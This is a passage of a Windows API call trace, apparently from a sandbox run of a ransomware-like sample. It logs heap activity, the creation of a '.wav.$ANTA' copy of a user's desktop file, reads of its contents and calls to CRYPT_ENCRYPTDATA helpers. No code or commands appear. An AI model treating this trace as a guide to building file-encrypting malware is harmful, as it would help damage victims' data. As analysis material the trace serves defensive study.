hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0118.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0118.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.372] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\1YTxNPPGwWg.wav.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\1ytxnppgwwg.wav.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0118.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0118.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.375] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0118.375] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0118.375] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0118.375] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0118.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0118.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0118.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0118.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0118.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e03020 [0118.379] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0118.379] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.381] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x58aa, lpOverlapped=0x0) returned 1 [0118.381] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0118.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x158aa) returned 0x4516010 [0118.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e03020 | out: hHeap=0x1780000) returned 1 [0118.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0118.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x158aa) returned 0x452b8c8 [0118.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0118.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.386] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0118.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.386] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x158aa) returned 0x4516010 [0118.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0118.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0118.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.387] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0118.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0118.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0118.387] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0118.387] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0118.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0118.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x158aa) returned 0x4516010 [0118.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.387] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x158aa) returned 0x499a008 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.388] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0118.389] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0118.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0118.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0118.389] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0118.389] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0118.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0118.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0118.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0118.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0118.390] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0118.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0118.390] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0118.391] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0118.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0118.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0118.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0118.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0118.392] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0118.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0118.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0118.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0118.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0118.392] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 